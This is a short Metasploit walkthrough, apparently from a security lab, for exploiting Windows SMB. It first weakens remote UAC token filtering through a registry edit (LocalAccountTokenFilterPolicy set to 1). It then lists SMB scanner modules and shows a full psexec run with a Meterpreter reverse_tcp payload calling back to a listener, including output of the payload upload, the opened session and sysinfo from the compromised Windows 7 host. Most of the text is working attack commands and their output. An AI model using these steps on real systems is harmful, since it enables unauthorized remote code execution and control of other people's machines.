If you want to exploit smb locally, you need to modify regedit settings and reboot your computer.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"LocalAccountTokenFilterPolicy"=dword:00000001
Run cmd / Powershell with administrator privilege, and execute the command:
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1
We can use the follow modules to exploit windows smb.
msf > use auxiliary/scanner/smb/
use auxiliary/scanner/smb/pipe_auditor
use auxiliary/scanner/smb/pipe_dcerpc_auditor
use auxiliary/scanner/smb/psexec_loggedin_users
use auxiliary/scanner/smb/smb2
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_enumusers
use auxiliary/scanner/smb/smb_enumusers_domain
use auxiliary/scanner/smb/smb_login
use auxiliary/scanner/smb/smb_lookupsid
use auxiliary/scanner/smb/smb_uninit_cred
use auxiliary/scanner/smb/smb_version
Meterpreter will be used for demo.
msf exploit(psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.101 yes The target address
RPORT 445 yes Set the SMB service port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass password no The password for the specified username
SMBUser nfs no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: , , seh, thread, process, none)
LHOST 192.168.1.108 yes The listen address
LPORT 8080 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(psexec) > run
[*] Started reverse handler on 192.168.1.108:8080
[*] Connecting to the server...
[*] Authenticating to 192.168.1.101:445|WORKGROUP as user 'nfs'...
[*] Uploading payload...
[*] Created \DMiyfhpP.exe...
[+] 192.168.1.101:445 - Service started successfully...
[*] Deleting \DMiyfhpP.exe...
[*] Sending stage (885806 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.108:8080 -> 192.168.1.101:1079) at 2015-08-15 04:46:06 +0000
meterpreter > sysinfo
Computer : SECLAB
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32
References
https://github.com/rapid7/metasploit-framework/wiki/What-does-my-Rex::Proto::SMB-Error-mean%3F